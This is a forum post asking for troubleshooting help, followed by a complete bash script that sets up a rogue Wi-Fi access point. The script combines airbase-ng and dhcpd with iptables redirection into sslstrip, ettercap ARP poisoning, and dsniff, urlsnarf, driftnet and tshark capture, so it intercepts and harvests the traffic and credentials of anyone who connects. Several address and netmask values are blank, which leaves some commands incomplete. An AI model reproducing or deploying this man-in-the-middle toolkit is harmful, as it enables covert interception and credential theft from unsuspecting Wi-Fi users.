I was able to use this script without any issues in BT4 Final, but for some reason, clients won't associate to the fake access point it creates in R1 and R2. I am using the RTL8187 chipset (High Power Alfa). Any ideas???


LOGDIR="$(date +%F-%H%M)"
mkdir $LOGDIR

killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail 

echo 'Network Interfaces:'
ifconfig | grep Link
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
ifconfig $WIFACE up

modprobe tun

#airbase-ng is going to create our fake AP with the SSID we specified
airbase-ng -e "$ESSID" -P -C 30 -v mon0  > airbase.log &
xterm -bg black -fg yellow -T airbase-ng -e tail -f airbase.log &

sleep 10

echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 netmask 
ifconfig at0 mtu 1400
route add -net netmask gw

echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

echo Creating a dhcpd.conf to assign addresses to clients that connect to us
echo "default-lease-time 600;" > dhcpd.conf
echo "max-lease-time 720;"  >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "authoritative;"  >> dhcpd.conf
echo "log-facility local7;"  >> dhcpd.conf
echo "subnet netmask {"  >> dhcpd.conf
echo "range;"  >> dhcpd.conf
echo "option routers;"  >> dhcpd.conf
echo "option domain-name-servers;"  >> dhcpd.conf
echo "}"  >> dhcpd.conf

echo 'DHCP server starting on our airdrop-ng interface (at0)'
dhcpd3 -f -cf dhcpd.conf at0 &
echo "Launching DMESG"
xterm -bg black -fg red -T "System Logs" -e tail -f /var/log/messages &
echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
xterm -bg black -fg blue -e ettercap -T -q -p -l ettercap.log -i at0 // // &
sleep 8

echo 'Configuring ip forwarding'
echo "1" > /proc/sys/net/ipv4/ip_forward

echo 'Launching various tools'
sslstrip -a -k -f &
driftnet -v -i at0 &
xterm  -bg black -fg green -e urlsnarf  -i at0 &
dsniff -m -i at0 -d -w dsniff.log &
tshark -i at0 -w traffic.pcap &